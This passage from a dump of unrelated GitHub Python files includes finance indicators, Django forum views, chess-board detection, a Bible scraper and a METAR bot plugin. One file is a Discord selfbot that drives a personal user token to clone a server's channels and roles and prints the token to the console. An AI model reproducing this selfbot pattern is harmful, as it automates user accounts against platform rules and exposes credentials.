r'stock_data_5y.txt')\nstock = stock_prices[:, 2]\n# [section 3] test for moving average\nMA_1 = indicators.moving_average(stock, n=100)\nMA_2 = indicators.moving_average(stock, n=30)\nMA_3 = indicators.moving_average(stock, n=3, weights=[0.4, 0.5, 0.1])\n# draw the diadram of 3 tests\nplt.figure(1)\nax = plt.gca()\nax.plot(stock[-2*365:],label = r'stock price')\nax.plot(MA_1, label = r'period = 200')\nax.plot(MA_2, label = r'period = 30')\nax.plot(MA_3, label = r'weighted')\nax.legend()\nplt.show()\n\n#%%\nOSC_1 = indicators.oscillator(stock,n=7)\nOSC_2 = indicators.oscillator(stock,n=7,osc_type='RSI')\nOSC_3 = indicators.oscillator(stock,n=30)\nplt.figure(2)\nax = plt.gca()\nax.set_ylim(0,1.25)\nax.plot(OSC_1, label = r'period = 7')\nax.plot(OSC_2, label = r'osc_type is\"RSI\"')\nax.plot(OSC_3, label = r'period = 30')\nax.legend()\nplt.show()\n\n#%%\nif os.path.exists('ledger_random.txt'):\n os.remove('ledger_random.txt')\nif os.path.exists('ledger_crossing.txt'):\n os.remove('ledger_crossing.txt')\nif os.path.exists('ledger_momentum.txt'):\n os.remove('ledger_momentum.txt')\nif os.path.exists('ledger_momentum_RSI.txt'):\n os.remove('ledger_momentum_RSI.txt')\nstock = stock.reshape(stock.shape[0],1)\nstrategy.random(stock)\nstrategy.crossing_averages(stock)\nstrategy.momentum(stock)\nstrategy.momentum(stock,osc_type='RSI',ledger='ledger_momentum_RSI.txt')\nresult_random,portfolio_random = tp.read_ledger('ledger_random.txt')\nresult_crossing,portfolio_crossing = tp.read_ledger('ledger_crossing.txt')\nresult_momentum,portfolio_momentum = tp.read_ledger('ledger_momentum.txt')\nresult_momentum_RSI,portfolio_momentum_RSI = tp.read_ledger('ledger_momentum_RSI.txt')","repo_name":"huwenhan-create/finance_tool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37628374929","text":"from typing import Dict\nfrom django.contrib.auth.models import User\nfrom django.db.models import query\nfrom django.http.response import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Comment, Thread, UserProfile, Post\nfrom .serializers import CommentSerializer, PostListSerializer, PostDetailSerializer, ThreadDetailSerializer, 
ThreadSerializer, UserProfileSerializer\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticatedOrReadOnly\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework import mixins\nfrom .permission import IsAdminOrReadOnly\nfrom rest_framework.decorators import action, permission_classes\nfrom rest_framework.reverse import reverse\nfrom rest_framework import status\nfrom django.http.request import QueryDict\nfrom django.db.models import Max\n\n# Create your views here.\n\n\"\"\"\nsandbox viewset\n\"\"\"\n\"\"\"\nclass SandBoxViewset(mixins.RetrieveModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):\n    queryset=UserProfile.objects.all()\n    serializer_class=UserProfileSerializer\n    permission_classes=[AllowAny]\n\n    def list(self, request, *args, **kwargs):\n        if request.auth:\n            print(\"request auth\")\n        else:\n            print(\"unknown user\")\n\n        if \"Authorization\" in request.COOKIES:\n            token = request.COOKIES[\"Authorization\"]\n            print(token)\n        else:\n            response = HttpResponse(status=status.HTTP_200_OK, content={\"detail\": \"set token\"})\n            testingToken = \"testing token\"\n            response.set_cookie(\"Authorization\", \"Token %s\"%(testingToken))\n            return response\n\n        return Response({\"detail\": \"testing sandbox\"}, status=status.HTTP_200_OK)\n\"\"\"\n\n\n\n\"\"\"\nAuth\nThis class inherits from ObtainAuthToken;\nthe parent class already provides a \"post\" view for login (post a body object containing username and password)\n\nThis child class adds a \"get\" method for verifying a token (get with {Authorization: token} headers);\nnot sure using the \"get\" method is right for this use, subject to change\n\n\"\"\"\nclass CustomObtainAuthToken(ObtainAuthToken):\n    # prevent returning 403, which leads to a sign-in dialog when using a browser\n    def get_invalidTokenResponse(self):\n        returnData = {\"Token\": \"Invalid Token\"}\n        print(\"return invalid response\")\n        return Response(returnData, status=status.HTTP_400_BAD_REQUEST) \n\n    # override handle_exception in order to avoid returning 403\n    def handle_exception(self, exc):\n        if (type(exc) == AuthenticationFailed):\n            return self.get_invalidTokenResponse()\n        return super().handle_exception(exc)\n\n    def get(self, request, format=None):\n        print(\"auth token get\")\n        if (request.auth):\n            user = request.user\n            serializers = UserProfileSerializer(user.userprofile)\n            return Response(serializers.data, status=status.HTTP_200_OK)\n        else:\n            return self.get_invalidTokenResponse()\n\n    \n\"\"\"\nCustomized viewset for userprofile\nIncludes create and retrieve (no one can view the whole user list, but everyone can sign up or view the user-detail view)\n\"\"\"\nclass UserProfileViewset(mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n    queryset=UserProfile.objects.all()\n    serializer_class=UserProfileSerializer\n    permission_classes=[AllowAny]\n\n    #create a new view for getting the post_set of a user\n    @action(detail=True, methods=[\"get\"], url_path=\"postset\", url_name=\"userPostset\")\n    def getUserPostSet(self, request, pk=None):\n        userprofile = get_object_or_404(UserProfile, pk=pk)\n        posts = userprofile.post_set.all()\n        serializer = PostListSerializer(posts, many=True, context={\"request\": request})\n        returnData = {\n            \"name\": userprofile.user.username, \n            \"post_set\": serializer.data\n        }\n        return Response(returnData, status=status.HTTP_200_OK)\n\n\n\"\"\"\nPost viewset (includes create post, retrieve post and list)\n\nThis viewset also includes 
a postComment (subject to change) method for leaving a comment without selecting the post.\nNot sure whether this is useful; it can also be done in the client-side application\n\"\"\"\nclass PostViewset(mixins.ListModelMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, mixins.DestroyModelMixin, viewsets.GenericViewSet):\n    queryset=Post.objects.all()\n    serializer_class=PostDetailSerializer\n    permission_classes=[IsAuthenticatedOrReadOnly]\n\n    #change the permission class to admin users only when deleting a post\n    def get_permissions(self):\n        if self.action == \"destroy\":\n            destroy_permission_classes = [IsAdminUser]\n            return [permission() for permission in destroy_permission_classes]\n        else:\n            return super().get_permissions()\n\n    def list(self, request):\n        queryset=Post.objects.all().annotate(latestCommentDate=Max(\"comment__pub_date\")).order_by(\"-latestCommentDate\")\n        \n        serializer=PostListSerializer(queryset, many=True, context={'request': request})\n        return Response(serializer.data)\n    \n    \n    def destroy(self, request, *args, **kwargs):\n        return super().destroy(request, *args, **kwargs)\n    \n    def get_queryset(self):\n        #annotate() returns a new queryset, so keep the result instead of discarding it\n        posts=Post.objects.all()\n        posts=posts.annotate(max_update_time=Max(\"comment__pub_date\")).order_by(\"-max_update_time\")\n        return posts\n\n    #this view helps leave a comment without the user selecting the post (not sure whether this is useful)\n    @action(detail=True, methods=['post'], url_path='cm', url_name='postComment')\n    def postComment(self, request, pk=None):\n        print(\"headers: \")\n        print(request.headers)\n\n        #args must be a sequence, so wrap pk in a list\n        post=reverse(\"forumAPI:post-detail\", args=[pk], request=request)\n\n        print(\"request data is \")\n        print(request.data)\n\n        #depending on the type of request.data, add post to the request data (subject to change)\n        isQueryDict = isinstance(request.data, QueryDict)\n\n        if (not isQueryDict):\n            request.data[\"post\"]=post\n        else:\n            #add post to the request data (not able to find another useful answer)\n            request.data._mutable=True\n            request.data[\"post\"]=post\n            request.data._mutable=False\n            #(subject to be changed in the future)\n        \n        serializer=CommentSerializer(data=request.data, context={'request': request})\n        serializer.is_valid(raise_exception=True)\n        self.perform_create(serializer)\n        headers=self.get_success_headers(serializer.data)\n        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\n\"\"\"\nThread ModelViewset\n\nOverrides retrieve (thread-detail) to change the serializer\nThe list serializer is 'ThreadSerializer'; it is used for the list view and does not include the post_set field\nThe detail serializer includes the post_set field\n\"\"\"\nclass ThreadViewset(mixins.ListModelMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n    queryset=Thread.objects.all()\n    serializer_class=ThreadSerializer\n    permission_classes=[IsAdminOrReadOnly]\n\n    #change the serializer to the thread detail serializer when the view is detail\n    def retrieve(self, request, pk=None):\n        queryset=Thread.objects.all()\n        thread=get_object_or_404(queryset, pk=pk)\n        serializer=ThreadDetailSerializer(thread, context={'request': request})\n        return Response(serializer.data)\n    \n    #this is for writing a new post in a thread\n    @action(detail=True, methods=[\"post\"], url_path=\"p\", url_name=\"writePost\", permission_classes = [IsAuthenticatedOrReadOnly])\n    def writePost(self, request, pk=None):\n        #args must be a sequence, so wrap pk in a list\n        thread=reverse(\"forumAPI:thread-detail\", args=[pk], request=request)\n\n        print(request.data)\n\n        isQueryDict = isinstance(request.data, 
QueryDict)\n\n        if (not isQueryDict):\n            request.data[\"thread\"]=thread\n        else:\n            #add thread to the request data (not able to find another useful answer)\n            request.data._mutable=True\n            request.data[\"thread\"]=thread\n            request.data._mutable=False\n            #(subject to be changed in the future)\n\n        serializer=PostDetailSerializer(data=request.data, context={'request': request})\n        serializer.is_valid(raise_exception=True)\n        self.perform_create(serializer)\n        headers=self.get_success_headers(serializer.data)\n        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\"\"\"\nComment Viewset\nThis viewset includes create and retrieve; no one can read the complete list of all comments\n\n\"\"\"\nclass CommentViewset(mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n    queryset=Comment.objects.all()\n    serializer_class=CommentSerializer\n\n\n\n","repo_name":"xxki99/Forum_Django-React","sub_path":"forum_backend/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"27863233767","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nimport asyncio \r\nimport logging\r\nimport random \r\nfrom colorama import init\r\nfrom colorama import Fore, Style\r\nimport requests\r\nimport json\r\nimport datetime\r\nimport threading\r\nimport time\r\n\r\ninit()\r\nos.system('cls' if os.name == 'nt' else 'clear')  # the previous expression 'cls' or 'clear' always evaluated to 'cls', so clear never ran\r\n\r\nprint(' ,---. ,-----.,--. ') # to change the font/lettering --> https://devops.datenkollektiv.de/banner.txt/index.html\r\nprint(\"' .-' ,---. ,--.--.,--. ,--.,---. ,--.--. ' .--./| | ,---. ,--,--, ,---. ,--.--.\")\r\nprint(\"`. `-.| .-. :| .--' \\ `' /| .-. :| .--' | | | || .-. || \\ .-. :| .--'\")\r\nprint(\".-' \\ --.| | \\ / \\ --.| | ' '--'\\| |' '-' '| || \\ --.| | \")\r\nprint(\"`-----' `----'`--' `--' `----'`--' `-----'`--' `---' `--''--'`----'`--'\", '{}{} V1.0 {}'.format(Fore.RESET, Fore.RED, Fore.RESET)) # Selfbot version\r\nprint(\" {}{}[ {}\".format(Fore.RESET, Fore.RED, Fore.RESET),end=\"\")\r\nprint(\"{}{}Coded BY Nico{}\".format(Fore.RESET, Fore.GREEN, Fore.RESET),end=\"\")\r\nprint(\"{}{} ]{}\".format(Fore.RESET, Fore.RED, Fore.RESET),\"\\n\\n\")\r\n\r\ntoken = input('{}\\n[>] {} TOKEN: {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\nprefix = input('{}\\n[>] {} PREFIX: {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\nclient = commands.Bot(command_prefix=prefix, case_insensitive=True,\r\n                      self_bot=True)\r\n\r\nclient.remove_command('help')\r\nheader = {\"Authorization\": f'Bot {token}'}\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\n\r\nintents = discord.Intents.all()\r\nintents.members = True\r\n\r\n@client.event\r\nasync def on_ready():\r\n    print(' ,---. ,-----.,--. ') # to change the font/lettering --> https://devops.datenkollektiv.de/banner.txt/index.html\r\n    print(\"' .-' ,---. ,--.--.,--. ,--.,---. ,--.--. ' .--./| | ,---. ,--,--, ,---. ,--.--.\")\r\n    print(\"`. `-.| .-. :| .--' \\ `' /| .-. :| .--' | | | || .-. || \\ .-. 
:| .--'\")\r\n print(\".-' \\ --.| | \\ / \\ --.| | ' '--'\\| |' '-' '| || \\ --.| | \")\r\n print(\"`-----' `----'`--' `--' `----'`--' `-----'`--' `---' `--''--'`----'`--'\", '{}{} V1.0 {}'.format(Fore.RESET, Fore.RED, Fore.RESET)) #versione del Selfbot\r\n print(\" {}{}[ {}\".format(Fore.RESET, Fore.RED, Fore.RESET),end=\"\")\r\n print(\"{}{}Coded BY Nico{}\".format(Fore.RESET, Fore.GREEN, Fore.RESET),end=\"\")\r\n print(\"{}{} ]{}\".format(Fore.RESET, Fore.RED, Fore.RESET),\"\\n\\n\")\r\n \r\n\r\n\r\n print('{}\\n[>] {} Cloner running... {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\n print('{}\\n[>] {} Command:{} {}copyserver\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n print('{}\\n[>] {} User info:{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix)) \r\n print(' - Logged in as ' + client.user.name)\r\n print(' - User ID: ' + str(client.user.id))\r\n print(' - User Token: ' + token)\r\n\r\n\r\n\r\n@client.command()\r\nasync def copyserver(ctx): #richiamo al comando copyserver\r\n \r\n print('{}\\n[>] {} cloning enabled... {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET)) #inizo del processo di clonazione\r\n await ctx.message.delete()\r\n wow = await client.create_guild(f'backup-{ctx.guild.name}')\r\n await asyncio.sleep(4) \r\n print('{}\\n[>] {} Server created {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))#creazione del server completata\r\n\r\n print(\"{}\\n[>]{} I'm cloning the channels....{}\".format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET)) #clonazione dei canali\r\n for g in client.guilds:\r\n if f'backup-{ctx.guild.name}' in g.name:\r\n for c in g.channels:\r\n await c.delete()\r\n for cate in ctx.guild.categories:\r\n x = await g.create_category(f\"{cate.name}\")\r\n for chann in cate.channels:\r\n if isinstance(chann, discord.VoiceChannel):\r\n await x.create_voice_channel(f\"{chann}\")\r\n if isinstance(chann, discord.TextChannel):\r\n await x.create_text_channel(f\"{chann}\")\r\n print(ctx.guild.roles,)\r\n print('{}\\n[>]{} Roles cloned:{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n for role in ctx.guild.roles[::-1]:\r\n if role.name != \"@everyone\":\r\n try:\r\n await wow.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)\r\n print(f\"Created new role : {role.name}\")\r\n except:\r\n break\r\n print('{}\\n[>]{} Cloning completed{}\\n'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET, prefix))\r\n\r\nclient.run(token, bot=False)","repo_name":"NicoDevv/Discord-Server-Cloner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"50"} +{"seq_id":"73397120475","text":"import sys\n\n\ndef produce_stats(i, line):\n values = list(map(int, line.split(' ')))\n values = values[1:]\n maximum = float('-inf')\n minimum = float('inf')\n\n for val in values:\n if val > maximum:\n maximum = val\n if val < minimum:\n minimum = val\n\n return f\"Case {i}: {minimum} {maximum} {maximum - minimum}\"\n\n\nif __name__ == '__main__':\n\n inputs = []\n for line in sys.stdin:\n inputs.append(line)\n# with open('sample_data/sample.in') as f:\n# inputs = [line.strip() for line in f]\n\nfor i in range(len(inputs)):\n print(produce_stats(i+1, 
inputs[i]))\n    exit(0)","repo_name":"curt-mitch/kattis","sub_path":"statistics/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"1055594954","text":"from numpy import pi\nimport cv2 \nfrom board_state_utils import SQUARE_SIZE\n\ndef add_boundaries(board_width,h,v,error): \n\t\"\"\"\n    Add horizontal and vertical lines to the boundary of the extracted board\n    \"\"\"\n\tif not (h[0][0] < error):\n\t\th.insert(0,[1.,h[0][1]])\n\th[0][0] = 1\n\tif not (h[-1][0] > board_width - error):\n\t\th.append([board_width,h[-1][1]])\n\th[-1][0] = board_width\n\tif not (v[0][0] < error):\n\t\tv.insert(0,[1.,v[0][1]])\n\tv[0][0] = 1\n\n\tif not (v[-1][0] > board_width - error):\n\t\tv.append([board_width,v[-1][1]])\n\tv[-1][0] = board_width\n\n\treturn h , v\n\ndef hor_vert_lines(lines):\n\t\"\"\"\n\tA line is given by rho and theta. Given a list of lines, returns a list of\n\thorizontal lines (theta=90 deg) and a list of vertical lines (theta=0 deg).\n\t\"\"\"\n\th = []\n\tv = []\n\tfor line in lines:\n\t\tfor distance, angle in line:\n\t\t\tif angle < pi / 4 or angle > pi - pi / 4:\n\t\t\t\tv.append([distance, angle])\n\t\t\telse:\n\t\t\t\th.append([distance, angle])\n\th.sort(key = lambda x : x[0])\n\tv.sort(key = lambda x : x[0])\n\treturn h, v\n\n\ndef sort_cnts(cnt):\n\t\"\"\"\n    Used for sorting an array of contours based on their width\n    \"\"\"\n\tx,y,w,h = cv2.boundingRect(cnt)\n\treturn w\n\ndef get_largest_sq(binary):\n\t\"\"\"\n    Return the largest square object found in the given binary image;\n\tit should be the chess board\n    \"\"\"\n\t#Image Processing to connect board checker pattern for contour extraction\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(1,1))\n\tbinary = cv2.morphologyEx(binary, cv2.MORPH_CLOSE, kernel)\n\tbinary = cv2.morphologyEx(binary, cv2.MORPH_OPEN, kernel)\n\t####Modification of image due to chess board borders####\n\tbinary = cv2.Canny(binary,50,150,apertureSize = 3)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(2,2))\n\tbinary = cv2.dilate(binary,kernel,iterations = 1)\n\t####Modification of image due to chess board borders####\n\n\t#Find All Contours\n\t# cnts = cv2.findContours(binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #Doesn't work if there is a larger border\n\tcnts = cv2.findContours(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\tcnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\t\n\t\n\t#Retrieve only the square contours with an error of {error}\n\tsq_cnts = []\n\terror = 5\n\tfor c in cnts:\n\t\tx,y,w,h = cv2.boundingRect(c)\n\t\tif abs(w - h) < error:\n\t\t\tsq_cnts.append(c)\n\t\n\t#Sort the square contours to retrieve the largest square contour \n\tif sq_cnts:\n\t\tsq_cnts.sort(key=sort_cnts,reverse=True)\n\t\tx,y,w,h = cv2.boundingRect(sq_cnts[0])\n\t\treturn x,y,w,h\n\t\n\telse:\n\t\treturn 0 ,0 , 0 , 0\n\t\t\n\ndef get_board_image(color):\n\t\"\"\"\n    Return the extracted largest squared contour from a given image \n    \"\"\"\n\t#Color to grey\n\tgrey = cv2.cvtColor(color, cv2.COLOR_BGR2GRAY)\n\n\t#Apply both threshold modes to determine which one produces the largest square\n\tret,img1 = cv2.threshold(grey,150,255,cv2.THRESH_BINARY)\n\tret,img2 = cv2.threshold(grey,150,255,cv2.THRESH_BINARY_INV)\n\n\t#Retrieve largest squares for both modes\n\tx1,y1,w1,h1 = get_largest_sq(img1)\n\tx2,y2,w2,h2 = get_largest_sq(img2)\n\n\n\tprint('w1 : ',w1)\n\tprint('w2 : ',w2)\n\n\t# No squares 
found\n\t# use == for value comparison; 'is' checks object identity and is unreliable for integers\n\tif (w1 == 0) and (w2 == 0):\n\t\treturn False , False\n\n\n\tif w1 > w2 : #Find which mode INV or NOT INV detected the largest square\n\t\tgrey_image = grey[y1:y1+h1, x1:x1+w1]\n\t\tcolor_image = color[y1:y1+h1, x1:x1+w1]\n\telse:\n\t\tgrey_image = grey[y2:y2+h2, x2:x2+w2]\n\t\tcolor_image = color[y2:y2+h2, x2:x2+w2]\n\t\n\treturn grey_image,color_image\n\ndef extract_pattern(board,h,v):\n\t\"\"\"\n    Check if the chess board pattern is found in the extracted square\n\tand return only the square that matched the pattern, removing redundant pixels\n    \"\"\"\n\terror = 5\n\thorz_pattern = False\n\tvert_pattern = False\n\tboard_found = False\n\n\t#Check horizontal pattern\n\tspacing = 5000\n\tstarting_h = 0\n\tcheckers_found = 1\n\tfor index in range(0,len(h)-1):\n\t\tif abs (h[index+1][0]-h[index][0] - spacing) > error:\n\t\t\tstarting_h = index\n\t\t\tcheckers_found = 1\n\t\t\tspacing = h[index+1][0]-h[index][0]\n\t\telse:\n\t\t\tcheckers_found = checkers_found + 1\n\t\tif checkers_found == 8:\n\t\t\tprint('Horizontal pattern found')\n\t\t\thorz_pattern = True\n\t\t\tbreak\n\t\t\n\t#Check vertical pattern\n\tspacing = 5000\n\tstarting_v = 0\n\tcheckers_found = 1\n\tfor index in range(0,len(v)-1):\n\t\tif abs (v[index+1][0]-v[index][0] - spacing) > error:\n\t\t\tstarting_v = index\n\t\t\tcheckers_found = 1\n\t\t\tspacing = v[index+1][0]-v[index][0]\n\t\telse:\n\t\t\tcheckers_found = checkers_found + 1\n\t\tif checkers_found == 8:\n\t\t\tprint('Vertical pattern found')\n\t\t\tvert_pattern = True\n\t\t\tbreak\n\t\n\t#Are horizontal and vertical patterns found \n\tif vert_pattern and horz_pattern:\n\t\tboard_found = True\n\t\tboard = board[int(h[starting_h][0]):int(h[starting_h + 8][0]),int(v[starting_v][0]):int(v[starting_v + 8][0])]\n\t\t\n\t\treturn board_found , board\n\telse:\n\t\treturn board_found , []\n\ndef extract_board(img):\n\t\"\"\"\n    Given a screenshot image from the user , extract a chess board if found\n    \"\"\"\n\t#Get largest square in the image\n\tgrey_board , color_board = get_board_image(img)\n\n\t#Check if a square was found\n\tif color_board is False:\n\t\tprint(\"Not Square\")\n\t\treturn False , None\n\n\t#Check if the size is at least the acceptable board size\n\t#TODO Scale up the image a bit if it was close to the min size\n\tif color_board.shape[0] < SQUARE_SIZE * 8:\n\t\tprint(\"Not good size\")\n\t\treturn False , None\n\n\t#Get Hough lines from the extracted square\n\timg_e = cv2.Canny(grey_board,50,150,apertureSize = 3)\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(2,2))\n\timg_e = cv2.dilate(img_e,kernel,iterations = 1)\n\tlines = cv2.HoughLines(img_e,1,pi/180,int(3/4 * len(color_board)))\n\n\t#Get horz and vert lines to check the pattern\n\th, v = hor_vert_lines(lines)\n\th, v = add_boundaries(len(color_board),h,v,5)\n\n\t#Extract the pattern\n\tboard_found , ex_board = extract_pattern(color_board,h,v)\n\n\tif board_found:\n\t\tcolor_board = ex_board\n\t\treturn board_found , color_board\n\n\telse:\n\t\treturn board_found , None\n","repo_name":"DyaPlus/ChessPlayer","sub_path":"board_extraction.py","file_name":"board_extraction.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"24922915857","text":"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\ndf = pd.read_csv('../data/model_128x4_64_64_2.csv', index_col=None)\n#df = pd.read_csv('../data/model_20x5_30x4_42_7_2.csv', index_col=None)\ndf.columns = ['agent', 
'rate']\ndf['x100'] = range(0, len(df))\n\nplt.figure(figsize=(14,6))\nfig = sns.lineplot(df.x100, df.rate, hue=df.agent)\nfig.set(xlabel='Number of games x100', ylabel='Winning rate')\nfig.set(ylim=(0, 1))\nplt.show()\n","repo_name":"arvjus/connect4","sub_path":"src/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11876254418","text":"#!/usr/bin/env python3\nimport requests\nfrom html.parser import HTMLParser\nfrom html.entities import name2codepoint\n\nwriting = False\nout = None\nweird = False\n\nout_all = open('Bible.txt', 'w')\n\nclass MyHTMLParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n global writing, out, out_all, weird\n if tag == 'div':\n if dict(attrs).get('class') in ['usfm_s1', 'usfm_p', 'MsoNormal', 'usfm_q', 'usfm_sp']:\n writing = True\n else:\n writing = False\n elif tag == 'b' and writing:\n out.write('\\n')\n out_all.write('\\n')\n elif tag == 'title':\n writing = True\n\n def handle_endtag(self, tag):\n global writing, out, out_all\n if tag == 'div' and writing:\n out.write('\\n')\n out_all.write('\\n')\n if tag == 'title' or tag == 'div':\n writing = False\n\n def handle_data(self, data):\n global writing, out, out_all\n if writing:\n if not out:\n t = data.strip()\n out = open('Bible/' + t + '.txt', 'w')\n out_all.write('\\n' + t + '\\n\\n')\n else:\n s = data.replace(' ', ' ')\n out.write(s)\n out_all.write(s)\n\nclass WeirdHTMLParser(MyHTMLParser):\n def handle_starttag(self, tag, attrs):\n global writing, out, out_all, weird\n if tag == 'title':\n writing = True\n elif tag == 'span' and weird:\n writing = True\n elif tag == 'div' and dict(attrs).get('class') == 'section js-section':\n weird = True\n elif tag == 'br':\n out.write('\\n')\n out_all.write('\\n')\n def handle_endtag(self, tag):\n global writing, out, out_all\n if tag == 'span' and writing:\n out.write(' ')\n out_all.write(' ')\n if tag == 'span' or tag == 'title':\n writing = False\n\nwith open('Bible_links.txt') as fin:\n for line in fin:\n ls = line.split()\n if len(ls) == 1:\n parser = MyHTMLParser()\n r = requests.get(line.strip())\n parser.feed(r.text)\n else:\n parser = WeirdHTMLParser()\n r = requests.get(ls[0])\n parser.feed(r.text)\n out.close()\n out = None\n weird = False\n\nout_all.close()\n","repo_name":"mr-martian/hyw-corpus","sub_path":"Bibles/Bible_western/hyw.bibleOTNT.asdvadzashunch/bible-scrape.py","file_name":"bible-scrape.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"71622079196","text":"\"\"\"\nLooks up the most recent METAR/TAF weather report for the supplied ICAO\nairport code.\n /bot metar \n /bot taf \n\nICAO Airport Codes:\nhttps://wikipedia.org/wiki/ICAO_airport_code\nMETAR source: http://aviationweather.gov\n\"\"\"\n\nimport logging\nfrom xml.etree import ElementTree\n\nimport aiohttp\n\nfrom hangupsbot import plugins\n\n\nlogger = logging.getLogger(__name__)\n\nHELP = {\n 'metar': _('Display the current METAR weather report for the supplied '\n 'ICAO airport code.\\n'\n ' {bot_cmd} metar \\n'\n 'ICAO Airport Codes: https://wikipedia.org/wiki/ICAO_airport_code'\n '\\nMETAR source: http://aviationweather.gov'),\n\n 'taf': _('Looks up the most recent TAF weather forecast for the supplied '\n 'ICAO airport code.\\n'\n ' {bot_cmd} taf \\n'\n 'ICAO Airport Codes: 
https://wikipedia.org/wiki/ICAO_airport_code\\n'\n 'TAF source: http://aviationweather.gov'),\n}\n\n\ndef _initialize():\n plugins.register_user_command([\n 'metar',\n 'taf',\n ])\n plugins.register_help(HELP)\n\n\nasync def _api_lookup(target, station):\n api_url = (\"http://aviationweather.gov/adds/dataserver_current/httpparam\"\n \"?dataSource={0}s&requestType=retrieve&format=xml&hoursBeforeNow\"\n \"=3&mostRecent=true&stationString={1}\").format(target, station)\n logger.debug('api call %s: url %r', id(api_url), api_url)\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(api_url) as response:\n response.raise_for_status()\n raw_text = await response.text()\n except aiohttp.ClientError as err:\n if not logger.isEnabledFor(logging.DEBUG):\n # add context\n logger.info('api call %s: url %r', id(api_url), api_url)\n logger.error(\n \"api call %s: failed with %r\",\n id(api_url), err\n )\n return None\n\n logger.debug('api call %s: raw %r', id(api_url), raw_text)\n\n try:\n root = ElementTree.fromstring(raw_text)\n raw = root.findall('data/{}/raw_text'.format(target))\n except ElementTree.ParseError as err:\n if not logger.isEnabledFor(logging.DEBUG):\n # add context\n logger.info('api call %s: url %r', id(api_url), api_url)\n logger.info('api call %s: raw %r', id(api_url), raw_text)\n\n logger.error(\n \"api call %s: parse error %r\",\n id(api_url), err\n )\n return None\n return raw\n\n\nasync def metar(dummy0, dummy1, *args):\n \"\"\"Display the current METAR weather report for the supplied ICAO airport\"\"\"\n code = ''.join(args).strip()\n if not code:\n return _(\"You need to enter the ICAO airport code you wish the look up,\"\n \"https://wikipedia.org/wiki/ICAO_airport_code\")\n\n data = await _api_lookup('METAR', code)\n\n if data is None:\n return _(\"There was an error retrieving the METAR information.\")\n if not data:\n return _(\"The response did not contain METAR information, check the \"\n \"ICAO airport code and try again.\")\n return data[0].text\n\n\nasync def taf(dummy0, dummy1, *args):\n \"\"\"Looks up the most recent TAF weather forecast for the supplied airport\"\"\"\n\n code = ''.join(args).strip()\n if not code:\n return _(\"You need to enter the ICAO airport code you wish the look up,\"\n \" https://wikipedia.org/wiki/ICAO_airport_code\")\n\n data = await _api_lookup('TAF', code)\n\n if data is None:\n return _(\"There was an error retrieving the TAF information.\")\n if not data:\n return _(\"The response did not contain TAF information, check the \"\n \"ICAO airport code and try again.\")\n return data[0].text\n","repo_name":"das7pad/hangoutsbot","sub_path":"hangupsbot/plugins/metar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"4863951697","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Treasure Generators for Crawler I\n# by Brock 